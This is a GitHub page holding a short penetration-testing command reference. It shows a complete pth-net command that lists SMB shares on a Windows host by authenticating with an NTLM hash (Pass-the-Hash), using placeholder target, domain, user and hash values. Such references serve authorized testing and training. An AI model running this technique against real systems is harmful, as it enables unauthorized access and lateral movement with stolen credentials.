Skip to content

Latest commit

 

History

History
30 lines (23 loc) · 762 Bytes

File metadata and controls

30 lines (23 loc) · 762 Bytes
description Enumerate SMB shares on a remote machine using the net rpc share list command with NTLM Pass-the-Hash.
Command Reference
Target IP Domain Username Hash
10.10.10.1
test.local
john
580B16D486D8D2CAFA00B314D41FA396 (NTLM hash)
command pth-net rpc share list -U 'test.local\john%00000000000000000000000000000000:580B16D486D8D2CAFA00B314D41FA396' -S 10.10.10.1
items
Hash
services
SMB
NTLM
OS
Windows
attack_types
Enumeration
references